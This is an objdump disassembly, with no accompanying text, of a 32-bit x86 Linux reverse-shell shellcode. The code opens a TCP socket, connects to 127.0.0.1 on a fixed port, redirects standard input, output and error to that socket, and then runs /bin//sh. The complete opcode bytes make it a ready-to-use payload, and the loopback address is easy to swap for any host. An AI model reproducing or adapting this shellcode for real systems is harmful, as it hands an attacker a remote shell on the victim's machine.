









Disassembly of section .text:

08048054 <_start>:
 8048054:	31 c0                	xor    %eax,%eax
 8048056:	31 db                	xor    %ebx,%ebx
 8048058:	31 c9                	xor    %ecx,%ecx
 804805a:	31 d2                	xor    %edx,%edx
 804805c:	50                   	push   %eax
 804805d:	6a 01                	push   $0x1
 804805f:	6a 02                	push   $0x2
 8048061:	89 e1                	mov    %esp,%ecx
 8048063:	b3 01                	mov    $0x1,%bl
 8048065:	b0 66                	mov    $0x66,%al
 8048067:	cd 80                	int    $0x80
 8048069:	89 c6                	mov    %eax,%esi
 804806b:	31 c0                	xor    %eax,%eax
 804806d:	50                   	push   %eax
 804806e:	50                   	push   %eax
 804806f:	68 7f 00 00 01       	push   $0x100007f
 8048074:	66 68 22 02          	pushw  $0x222
 8048078:	b0 02                	mov    $0x2,%al
 804807a:	66 50                	push   %ax
 804807c:	89 e1                	mov    %esp,%ecx
 804807e:	6a 10                	push   $0x10
 8048080:	51                   	push   %ecx
 8048081:	56                   	push   %esi
 8048082:	89 e1                	mov    %esp,%ecx
 8048084:	b3 03                	mov    $0x3,%bl
 8048086:	b0 66                	mov    $0x66,%al
 8048088:	cd 80                	int    $0x80
 804808a:	89 f3                	mov    %esi,%ebx
 804808c:	31 c9                	xor    %ecx,%ecx
 804808e:	b0 3f                	mov    $0x3f,%al
 8048090:	cd 80                	int    $0x80
 8048092:	41                   	inc    %ecx
 8048093:	b0 3f                	mov    $0x3f,%al
 8048095:	cd 80                	int    $0x80
 8048097:	41                   	inc    %ecx
 8048098:	b0 3f                	mov    $0x3f,%al
 804809a:	cd 80                	int    $0x80
 804809c:	31 d2                	xor    %edx,%edx
 804809e:	52                   	push   %edx
 804809f:	68 2f 2f 73 68       	push   $0x68732f2f
 80480a4:	68 2f 62 69 6e       	push   $0x6e69622f
 80480a9:	89 e3                	mov    %esp,%ebx
 80480ab:	52                   	push   %edx
 80480ac:	53                   	push   %ebx
 80480ad:	89 e1                	mov    %esp,%ecx
 80480af:	b0 0b                	mov    $0xb,%al
 80480b1:	cd 80                	int    $0x80
 80480b3:	40                   	inc    %eax
 80480b4:	cd 80                	int    $0x80
